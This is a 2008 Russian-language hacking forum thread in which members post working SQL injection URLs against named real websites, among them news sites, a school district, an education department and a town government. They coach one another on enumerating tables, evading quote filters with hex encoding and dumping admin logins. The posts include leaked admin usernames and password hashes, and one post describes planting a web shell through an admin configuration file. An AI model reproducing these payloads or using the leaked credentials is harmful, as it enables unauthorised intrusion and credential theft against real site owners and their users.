SQL Инъекции

SeNaP · 25 Aug 2008

http://www.tartanarmy.co.uk/news/news.php?id=-13+union+select+1,3,3,4,5,6/*
дальше не могу
-------------
http://www.variant-billiard.ru/news.php?id=-13+union+select+1,2,3,4,5/*
Версия MySQL

http://www.variant-billiard.ru/news.php?id=-13+union+select+1,2,3,VERSION(),5/*
USER
http://www.variant-billiard.ru/news.php?id=-13+union+select+1,2,3,USER(),5/*
База Данных
http://www.variant-billiard.ru/news.php?id=-13+union+select+1,2,3,DATABASE(),5/*
----------------------------------
вот еще одна, только я не логаняю что дальше

http://www.theenemy.com/news.php?id=-13+union+select+1,2,3,4,5,6,7,8,9,10,11/*
--------------------------------
http://post-dvor.ru/news.php?id=-13+union+select+1,2,3,4/*
версия MySQL 4.0.27-log 3
--------------------------
http://www.budd-pni.com/news.php?ID=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
--------------------------

USAkid · 26 Aug 2008

SeNaP said:

http://www.tartanarmy.co.uk/news/news.php?id=-13+union+select+1,3,3,4,5,6/*
дальше не могу
Click to expand...

Давай поможем
Code:
http://www.tartanarmy.co.uk/news/news.php?id=-13+union+select+1,unhex(hex(version())),3,4,5,6/*
version() - 4.1.15-standard
user() - [email protected]
database() - tartanarmy_cms

Также докрутим
Таблички:
Code:
http://www.rdi-cam.com/pic.php?i=-33+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables/*
и
Code:
http://www.rdi-cam.com/pic.php?i=-33+union+select+1,concat_ws(version(),user(),database()),3,4,5,6,7,8/*
Все в твоих руках. Главное - пробовать Удачи

SeNaP · 26 Aug 2008

USAkid said:
Давай поможем
Code:
http://www.tartanarmy.co.uk/news/news.php?id=-13+union+select+1,unhex(hex(version())),3,4,5,6/*
........
Click to expand...
спасибо

SeNaP · 26 Aug 2008

Вот еще SQL

http://www.mayorlukes.com/news.php?id=-13+union+select+1,2,3,4,5,6,7--
-----------------
Таблица USERS
http://www.mayorlukes.com/news.php?id=-13+union+select+1,2,table_name,4,5,6,7+from+INFORMATION_SCHEMA.TABLES--

а как её просмотреть!?

потскажите и покажите пожалуйсто

USAkid · 26 Aug 2008

SeNaP said:

Вот еще SQL

http://www.mayorlukes.com/news.php?id=-13+union+select+1,2,3,4,5,6,7--
-----------------
Таблица USERS
http://www.mayorlukes.com/news.php?id=-13+union+select+1,2,table_name,4,5,6,7+from+INFORMATION_SCHEMA.TABLES--

а как её просмотреть!?

потскажите и покажите пожалуйсто
Click to expand...
Code:
http://www.mayorlukes.com/news.php?id=-13+union+select+1,2,name,4,5,6,7+from+users+limit+2,1--
и пересматривай лимитом

Добавляю:
e-mail админа: [email protected]
админка: http://www.mayorlukes.com/administrator/admin.php

еше кое-что интересное: Provided by DLG Results. Оф. сайт - http://www.dlgresults.com/
остаеца узнать пасс и залезть внутрь )...

SeNaP · 26 Aug 2008

USAkid, спасибо

USAkid · 26 Aug 2008

SeNaP said:

USAkid, спасибо
Click to expand...

Для спасибо есть плюсики

SeNaP · 26 Aug 2008

USAkid said:

Для спасибо есть плюсики
Click to expand...

sabe · 26 Aug 2008

SeNaP

http://www.tartanarmy.co.uk/news/news.php?id=-13+union+select+1,3,3,unhex(hex(version())),5,6/*
Click to expand...

версия 4.

http://www.tartanarmy.co.uk/news/news.php?id=-13+union+select+1,3,3,unhex(hex(concat_ws(0x3a,user,password))),5,6+from+mysql.user/*
Click to expand...

рут..

http://www.theenemy.com/news.php?id=-13+union+select+1,2,version(),4,5,6,7,8,9,10,11/*
Click to expand...

4 ver..

http://www.budd-pni.com/news.php?ID=-13+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
Click to expand...

SeNaP · 26 Aug 2008

sabe, а что вот это "unhex(hex" ?

SeNaP · 26 Aug 2008

вот нашол SQL инж

http://www.eastbaythunder.com/news.php?id=-16+union+select+1,2,3,4,5,table_name,7+from+INFORMATION_SCHEMA.TABLES+limit+19,1/* таблица "админ" , а как её вскрыть? :?

4p3 · 26 Aug 2008

SeNaP said:

вот нашол SQL инж

http://www.eastbaythunder.com/news.php?id=-16+union+select+1,2,3,4,5,table_name,7+from+INFORMATION_SCHEMA.TABLES+limit+19,1/* таблица "админ" , а как её вскрыть? :?
Click to expand...

http://www.eastbaythunder.com/news.php?id=-16+union+select+1,2,3,4,5,column_name,7+from+INFORMATION_SCHEMA.columns+where table_name='admin'/*
Click to expand...

Если фильтрует кавычки, то используй вместо 'admin'
0x61646d696e. Это тоже самое, но в hex.

Как вариант можешь использовать SIPT 4.0, она делает всю рутинную работу.

Вот что получилось выдрать с базы

Getting Data from table admin from database eastbayt_store
Fields admin_groups_id:admin_firstname:admin_lastname:admin_password

[0]:1:Sandy and Keven:Torres:065b34a51dd6819e14c87d580055ac42:e7
[1]:2:Customer:Service:a619003120892efc8cf3a44c85982aec:44
Click to expand...

$n@ke · 26 Aug 2008

http://www.bscs.k12.mi.us/website/index.php?subpage_id=94
Click to expand...

User:website@localhost
Version:4.1.20 (((
Dbname:website

USAkid · 26 Aug 2008

Ух ты... Сайт какого-то департамента образования
Code:
http://www.dosakh.ru/index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11+from+mos_users--
admin:6672984060ab7eb061aa87cc089e761b (MD5)

расшифровать неполучилось(... Если кто сможет - отпишите

Идем далее:
Code:
http://www.dosakh.ru/index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat_ws(version(),0x3a,user(),0x3a,database()),6,7,8,9,10,11--
version() - 4.1.22
user() - dosakhru
database() - [email protected]

Зайдя на главную админки написано:
Разработка: Воробьев И.К.
Клева он сайты делает

SeNaP · 26 Aug 2008

4p3, чтот я не смог самостоятельно открыть таблицу admin

serfertty · 26 Aug 2008

Смотри и учись юный падаван
065b34a51dd6819e14c87d580055ac42:e7- хэш админа нагел так
Code:
http://www.eastbaythunder.com/news.php?id=-16+union+select+1,2,3,4,5,admin_password,7+from+admin/*
Перебирая
Code:
http://www.eastbaythunder.com/news.php?id=-16+union+select+1,2,3,4,5,column_name,7+from+INFORMATION_SCHEMA.columns+where+table_name=0x61646d696e+limit+5,1/*
Вот и все там кстати было мыло админа.

Cennarios · 26 Aug 2008

Турпортал.... Еб..м и наслаждаемся!

http://www.argoturas.lt/index.php?lng=en&action=page&id=-1+union+select+concat(0x3a3a,user_login,0x3a3a,user_password),null,null+from+sys_user+limit+0,1

http://www.argoturas.lt/admin/

В админке, через файл конфига есть возможность выполнения php кода. -> дописываем, шелим и тп...

$n@ke · 26 Aug 2008

городишко кокойто..есть даже Wanted))

http://www.town.madison.wi.us/fire/calendar/index.php?display=event&id=-772
Click to expand...

http://www.town.madison.wi.us/admin/

bill:RbILYS.h/oJD6
ltwcal:Rb6tYJLLkwwfM
gregory:RbccLVAoMKun.
bloom:Rbsf/mIEnfcgY
rose:Rbt1QrY2Izgkg:works4me
schwass:RbpTOUCiVsWOk

dr.Pilulkin · 26 Aug 2008

http://www.itcdc.com/explore.php?p=22+limit+0+union+select+1,2,concat_ws(char(58),username,password),4+from+itc.users+limit+1,1/*

admin:bc5f1dcf127870a3d1acaf8a0ef99f11

USAkid · 26 Aug 2008

SeNaP said:

чем можно загадирвать текст в hek ?
Click to expand...

http://hack-shop.org.ru/tools-code-encode

SQL Hex + 0x | Path

SQL Инъекции

SeNaP Elder - Старейшина

USAkid Elder - Старейшина

SeNaP Elder - Старейшина

SeNaP Elder - Старейшина

USAkid Elder - Старейшина

SeNaP Elder - Старейшина

USAkid Elder - Старейшина

SeNaP Elder - Старейшина

sabe Elder - Старейшина

SeNaP Elder - Старейшина

SeNaP Elder - Старейшина

4p3 Elder - Старейшина

$n@ke Elder - Старейшина

USAkid Elder - Старейшина

SeNaP Elder - Старейшина

serfertty Guest

Cennarios Elder - Старейшина

$n@ke Elder - Старейшина

dr.Pilulkin Elder - Старейшина

USAkid Elder - Старейшина

Useful Searches

SQL Инъекции

SeNaP Elder - Старейшина

USAkid Elder - Старейшина

SeNaP Elder - Старейшина

SeNaP Elder - Старейшина

USAkid Elder - Старейшина

SeNaP Elder - Старейшина

USAkid Elder - Старейшина

SeNaP Elder - Старейшина

sabe Elder - Старейшина

SeNaP Elder - Старейшина

SeNaP Elder - Старейшина

4p3 Elder - Старейшина

$n@ke Elder - Старейшина

USAkid Elder - Старейшина

SeNaP Elder - Старейшина

serfertty Guest

Cennarios Elder - Старейшина

$n@ke Elder - Старейшина

dr.Pilulkin Elder - Старейшина

USAkid Elder - Старейшина